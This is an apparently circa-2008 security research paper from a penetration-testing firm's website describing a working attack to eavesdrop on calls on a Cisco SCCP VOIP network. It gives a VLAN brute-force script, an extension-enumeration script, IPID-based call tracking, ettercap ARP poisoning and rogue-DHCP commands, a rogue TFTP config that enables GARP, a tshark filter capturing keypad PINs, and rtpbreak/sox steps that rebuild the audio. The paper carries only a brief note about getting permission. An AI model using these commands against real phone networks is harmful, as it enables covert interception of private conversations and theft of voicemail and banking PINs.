info@hackprocess.com +61 (0)47 280 9177

VOIP Eavesdropping Research

INTRODUCTION

Originally written circa 2008–2010 .. The following paper describes my successful attempts to compromise the confidentiality of communications on a sample VOIP network. The network is comprised of the following equipment:

  • Handsets: Cisco 7941 (GARP Enabled)
  • Call Manager: Cisco Call Manager 7.1 - Signalling Protocol: SCCP
  • Switching: No Port Security features enabled

It would not be advisable to attempt these eavesdropping techniques on a live VOIP network without explicit permission. The primary full duplex attack (internal → internal) I'm describing lacks 'point and click' precision, although it does work. Sometimes it is not uncommon for the phone to attempt to re-register itself due to various factors, in which case it will be unavailable for approximately three minutes.

In order for the attack to work in a practical way, it needs to be planned and premeditated. A certain degree of luck is also involved. The more carefree you have the authority to be with the infrastructure, the more you can start to swing the consistent odds of success in your favour though.

Connecting to the Voice VLAN

Let us assume that we are unaware of the VLAN ID belonging to the voice network that we need to connect to. How can we find this piece of information? Well, without the luxury of being able to ask the network administrator, or look at the phones' network configuration settings which will tell you (as they may be disabled), we have two practical methods at our disposal.

The first method we can use is inspecting CDP packets on the network. CDP should disclose the relevant VLAN ID we're looking for. We can use any respectable sniffer to look at the packet that may disclose this information.

If CDP is not running we have to make certain assumptions. In fact, we have to make them regardless if we want to try to connect to the Voice VLAN. This is because we're taking the pretence that we’ve no prior knowledge of the configuration of the switch and the possible security controls that may be put in place to prevent us connecting to it, somewhat illegitimately.

The second method we can employ is essentially 'brute force'. The 802.1q switching protocol has a limited amount of potential VLANs it can utilise in any given switching fabric. There are 4094 possible VLAN IDs. This is not going to take too long to enumerate. We need to guess the VLAN ID by systematically cycling through them, trying to DHCP an address each time we configure a virtual interface. The chances are it will be somewhere between 1 and 100, or most certainly under 1000. In order to speed the process up you can of course use an alternative DHCP client where you can tweak timeout parameters. Also, look at potentially obvious things like the third octet in the data LAN IP addressing scheme being similar/close to the voice VLAN ID.

These actions are based on the assumption that our switch port is a member of a voice VLAN and DHCP is servicing this network. Once we have compiled 802.1q support into our kernel, or loaded it as a module, we can now attempt to start cycling through VLAN IDs and attempting to DHCP an address.

#!/bin/bash

VLANNUM=2

while [ $VLANNUM -lt 4094 ]; do
  vconfig add eth0 $VLANNUM
  dhcpd eth0.$VLANNUM
  vconfig rem eth0.$VLANNUM
  let VLANNUM=VLANNUM+1
done

If you lease an IP address successfully you may want to ARP scan a segment on the network and look at the OUI component of the MAC address to confirm you're actually dealing with handsets and VOIP kit.

Target Discovery

When we've successfully connected to the voice network, target selection at an IP level is straightforward. We merely choose an IP address, or addresses that we would like to monitor through conventional enumeration. This, unfortunately, will be no fun if you happen to choose handsets that provide 'low value' information, or choose relatively redundant or sparsely used handsets. What we want to do is target specifically interesting people in the organisation through positive identification, or through phone utilisation, as this is more than likely going to provide much more valuable information.

If we quickly look at available TCP services on the phones, we know that there is often an HTTP daemon running on the phones. This volunteers virtually everything of interest about the configuration of our phone, including the extension it is mapped to. The following Python script, whilst not particularly elegant, will save you some time assimilating what IP addresses relate to what extension number in a given IP address range.

#!/usr/bin/python

# Usage: python3 looper.pl 192.168.1.1-192.168.1.254

import sys
import ipaddress
import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor

def fetch_and_parse(ip):
    try:
        url = f"http://{ip}"
        response = requests.get(url, timeout=2)
        soup = BeautifulSoup(response.text, 'html.parser')
        bold_tags = soup.find_all('b')
        numbers = [tag.text for tag in bold_tags if tag.text.isdigit() and len(tag.text) == 4]
        if numbers:
            print(f"{ip} is Ext: {', '.join(numbers)}")
        else:
            print(f"{ip} no 4-digit bold numbers found.")
    except Exception as e:
        print(f"{ip} error: {e}")

def ip_range(start_ip, end_ip):
    start = ipaddress.IPv4Address(start_ip)
    end = ipaddress.IPv4Address(end_ip)
    return [str(ip) for ip in ipaddress.summarize_address_range(start, end)][0]

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 looper.py 192.168.1.1-192.168.1.254")
        sys.exit(1)

    start_ip, end_ip = sys.argv[1].split('-')
    all_ips = list(ipaddress.summarize_address_range(ipaddress.IPv4Address(start_ip), ipaddress.IPv4Address(end_ip)))
    
    # Expand the range into individual IPs
    ips = [str(ip) for ip in ipaddress.summarize_address_range(ipaddress.IPv4Address(start_ip), ipaddress.IPv4Address(end_ip))]
    expanded_ips = [str(ip) for ip in ipaddress.IPv4Network(ips[0])]

    # Use threads for speed
    with ThreadPoolExecutor(max_workers=10) as executor:
        executor.map(fetch_and_parse, expanded_ips)

Speculating Phone Utilisation With IPID

There are Cisco facilities that will happily compile and report call statistics for relevant bodies. However, we can do our own with an interestingly high degree of accuracy using IPv4 packets, in real time. The Cisco phones I've experimented with use a universal incrementing IPID field—not unlike the IPv4 stacks of other uncultured operating systems. This effectively means that we can look at the typical packet quanta that is being exchanged when the phone is in various states. It is fairly consistent.

Armed with this knowledge, I believe it is now relatively easy to plot a particular user's use of their IP phone. Not only can we detect if they've simply picked the phone off the hook, but we can also deduce their call lengths and whether the handset initiated the call or received it. We can also guess how many digits they've dialled and possibly fathom a guess if the call is local, national or international (based on time differences between successive digits pressed). Here are the results of some experiments I conducted:

Picking the phone off the hook — IPID increment of 5:

HPING 10.64.0.18 (eth0.64 10.64.0.18): NO FLAGS are set, 40 headers + 0 data bytes

len=50 ip=10.64.0.18 ttl=32 id=1800 sport=0 flags=RA seq=8 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=1801 sport=0 flags=RA seq=9 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=1802 sport=0 flags=RA seq=10 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=1807 sport=0 flags=RA seq=11 win=8192 rtt=0.5 ms - Phone off hook
len=50 ip=10.64.0.18 ttl=32 id=1808 sport=0 flags=RA seq=12 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=1809 sport=0 flags=RA seq=13 win=8192 rtt=0.5 ms

Calling the extension remotely and hanging up remotely — IPID increment of 3:

HPING 10.64.0.18 (eth0.64 10.64.0.18): NO FLAGS are set, 40 headers + 0 data bytes

len=50 ip=10.64.0.18 ttl=32 id=5341 sport=0 flags=RA seq=0 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5342 sport=0 flags=RA seq=1 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5345 sport=0 flags=RA seq=2 win=8192 rtt=0.4 ms - Phone rings
len=50 ip=10.64.0.18 ttl=32 id=5346 sport=0 flags=RA seq=3 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5347 sport=0 flags=RA seq=4 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5350 sport=0 flags=RA seq=5 win=8192 rtt=0.4 ms - Call terminated
len=50 ip=10.64.0.18 ttl=32 id=5351 sport=0 flags=RA seq=6 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=5352 sport=0 flags=RA seq=7 win=8192 rtt=0.4 ms

Calling the extension (internal to internal), picking up the phone and having a quick conversation:

len=50 ip=10.64.0.18 ttl=32 id=8158 sport=0 flags=RA seq=13 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8159 sport=0 flags=RA seq=14 win=8192 rtt=0.5 ms - Phone rings
len=50 ip=10.64.0.18 ttl=32 id=8162 sport=0 flags=RA seq=15 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=8163 sport=0 flags=RA seq=16 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8164 sport=0 flags=RA seq=17 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8165 sport=0 flags=RA seq=18 win=8192 rtt=0.5 ms
len=50 ip=10.64.0.18 ttl=32 id=8167 sport=0 flags=RA seq=19 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8168 sport=0 flags=RA seq=20 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8169 sport=0 flags=RA seq=21 win=8192 rtt=0.4 ms - Call Answered
len=50 ip=10.64.0.18 ttl=32 id=8174 sport=0 flags=RA seq=22 win=8192 rtt=0.4 ms - Conversation
len=50 ip=10.64.0.18 ttl=32 id=8223 sport=0 flags=RA seq=23 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8274 sport=0 flags=RA seq=24 win=8192 rtt=0.4 ms - IPID Inc ~50
len=50 ip=10.64.0.18 ttl=32 id=8326 sport=0 flags=RA seq=25 win=8192 rtt=0.4 ms
len=50 ip=10.64.0.18 ttl=32 id=8377 sport=0 flags=RA seq=26 win=8192 rtt=0.5 ms - Conversation

Summary of Phone Actions:

Phone Action IPID Increment
Taking the phone off the hook 5
Phone Ringing 3
Dialling A Number 2 - 5 (per digit, 3 is average)
Call in Progress ~50

With this information an attacker could potentially use it to their advantage in a number of ways:

  • Identify the busiest handsets (and therefore ones likely to divulge interesting information)
  • Identify users who received but never answered calls (possibly indicating voicemails)
  • Determine which users are physically present on a given day

The analysis above should not be perceived as being surgically accurate. There are many factors that could easily throw your results and make them inaccurate. It is, nonetheless, an interesting observation to make.

Half-Duplex Eavesdropping

Taking into consideration the composure of a standard VOIP deployment within an organisation (i.e. multiple VLANs for handsets and at least one for voice servers), if we want to have the ability to intercept all voice streams initiated to and from a handset, we need to be able to cover a number of angles. Firstly, we need to be connected to the same voice VLAN of at least one of the parties involved in the call. Secondly, we need to do enough to eavesdrop on calls made specifically within our network to the same network and also calls made to handsets outside our network, through the default gateway.

In order to intercept the packets between two hosts on the same segment, the standard way of doing business is to poison the ARP cache of the two hosts, with gratuitous ARP response packets. But we can't do this in this instance. The problem for us is that Cisco has disabled the casual acknowledgment of Gratuitous ARP replies on these handsets. It just ignores the packets. It is a setting that you can view from the phones' settings button. We either need to find a way of disabling it or try to perform a MITM / Eavesdropping attack through other means.

One possibility at this point is using a utility like macof to fill the CAM table of the switch and get it to broadcast all (RTP) packets on the network to our interface. We don't actually need to be in the middle of the conversation — we just want to listen to it.

Bearing in mind that the switch has not been protected with any port security measures, there's nothing to stop us from altering the ARP cache on the switch, informing it that one host, or the entire subnet’s data should now be forwarded through us.

This will at least allow us to intercept one half of the conversation from external calls and voicemails that are being listened to by the relevant handset. I have tried the most popular tool arpspoof for this and consistently managed to cause the handsets to crash. I have not established the cause of this yet. The tool ettercap generally proved to be a much more versatile tool (although not without its limitations and bugs that I'll later mention).

ettercap -i eth0.10 -T -M arp:remote /10.10.1.50/ /10.10.1.1/

Full-Duplex Eavesdropping

In order to coerce the phone into sending packets to us, one of the options we have available to us is changing the phone’s default route.

DHCP Race Reply

The next step now is to try to win a DHCP race between the legitimate DHCP server servicing that network and a rogue DHCP daemon I set up. If we can win a DHCP race for a requesting client, we can alter the host’s default route.

Using a legitimate DHCP server wasn't cutting it, so I decided to try ettercap. There are other tools you can use to do this, as I found ettercap would crash consistently under certain circumstances, but the other tools lacked capabilities (e.g. wesley) or simply lacked intuitiveness and documentation (e.g. yersinia).

The following command will set up our fake DHCP server:

ettercap -i eth0.10 -T -M dhcp:10.10.1.100,101-150/255.255.0.0/10.10.1.1

On my network I was winning the race reply about 50% of the time. This was with a multi-purpose AD/DNS/DHCP server provisioning DHCP from a different network. A 50% success rate is not enough to satisfy me, but it is also not that bad. The phone’s DHCP lease does expire naturally every five days.

If we want to, we can attempt to DOS the phone and stress the DHCP server slightly at the same time to increase our success rate — we only need a few additional milliseconds. Very surprisingly, when DHCP services were moved away from this server and were directly handed over to the switch, I won the DHCP race 100% of the time. This surprised me, as I thought a DHCP ACK generated from within the switch would be sent to a requesting device quicker than one sent down the wire from another host to its recipient.

Once we have won the race, we now have a Layer 3 connection from the handset to our monitoring host, and a Layer 2 connection from the real default gateway to our monitoring host (posing as the handset).

If we wanted to, we could NAT the packets with iptables coming through us from the handset and do away with the necessity for ARP spoofing the handset, as we would then keep a state table — and as far as the real default gateway is concerned, we’re actually doing the ‘talking’.

Intercepting Voicemail Passwords

In addition to voice conversations, we may be interested in voicemail passwords or other PINs. The following Wireshark filter expression will decode what buttons a user is pressing. This will, of course, identify what numbers they are dialling, voicemail passwords, telephone banking details, etc. It would not be impossible to modify the filter expressions with a few pipes and grep actions to Google dialled phone numbers automatically and attempt to ascertain whom exactly the user has called.

tshark -V -r voicemail.pcap skinny.stationKeypadButton | grep -e "Source:" -e "KeypadButton:"
Source: 00:1b:2a:c7:08:4b (00:1b:2a:c7:08:4b)
Source: 10.10.1.50 (10.64.0.85)
KeypadButton: One (0x00000001)
Source: 00:1b:2a:c7:08:4b (00:1b:2a:c7:08:4b)
Source: 10.10.1.50 (10.64.0.85)
KeypadButton: Two (0x00000002)

Enabling GARP

At this point we can monitor communications into and out of our network from an identified handset. If we want to monitor communications between handsets on the same LAN, we can follow through with the next steps. We have won a DHCP race reply and changed the default route to our own host.

If no TFTP server IP address has been declared in the DHCP ACK response, the phone then tries to use the default route it has just been given to TFTP an XML configuration file down. In this file, many of the phone’s settings can be configured — including our GARP setting.

<settingsAccess>1</settingsAccess><garp>1</garp><voiceVlanAccess>0</voiceVlanAccess>

What we do now is manually get the phone’s original XML file with a TFTP client from the legitimate TFTP server. We then set up our own TFTP server on the same address as the rogue default route and load the modified XML file into the specific directory.

If we know this ahead of time, the phone will then happily download its new configuration from our own TFTP server. If you check the settings on your phone, you should be able to confirm that GARP is now enabled.

Full Duplex ARP Cache Poisoning

At this point, we should have control of the default route of at least two phones we want to monitor communications between, on the same segment. Whilst we can observe data traversing the default route, we can't monitor the conversation because the two phones are on the same segment and don't need the default gateway to exchange RTP packets once SCCP has set up the call. A full-duplex ARP cache poison should now work:

ettercap -i eth0.10 -T -M arp:oneway /10.10.1.50/ /10.10.1.60/
ettercap -i eth0.10 -T -M arp:oneway /10.10.1.60/ /10.10.1.50/

Listening to Users Conversations

Various codecs can be used to sample audio data which are then wrapped up in RTP packets and sent to their destination over UDP. Decoding them, depending on the circumstances, can be somewhat tricky. The one tool that worked consistently for me was rtpbreak.

I tried in vain to make vomit and rtptools work for my needs — unfortunately these tools tended to segfault consistently with minimal provocation. They also lacked flexibility and/or documentation. I was also incredibly frustrated with the RTP decoding mechanism in Wireshark, which despite being around for several years, is still incredibly poor.

My experience indicated that if you're dealing with codecs other than G711u, you’ll probably run into some kind of frustration while decoding or playing it. Often, it's not just one codec used either — one codec may be used for internal calls, another for WAN links, and yet another for external calls to mobiles or landlines.

I did discover one way to try to keep G711u as the default codec. In the phone’s XML configuration file (discussed earlier), there are two fields where you can explicitly disable G722. Setting both values to 0 may help:

<g722CodecSupport>1</g722CodecSupport>
<advertiseG722Codec>1</advertiseG722Codec>

Once the provisions have been made to intercept RTP data, the following sequence of commands should provide the telephone conversation for you:

rtpbreak -i eth0.10 -g -m

sox -r8000 -c1 -t ul rtp.0.0.raw -t wav 0.wav
sox -r8000 -c1 -t ul rtp.0.1.raw -t wav 1.wav
sox 0.wav 1.wav call.wav

The file call.wav can then be played using any audio player that supports WAV format.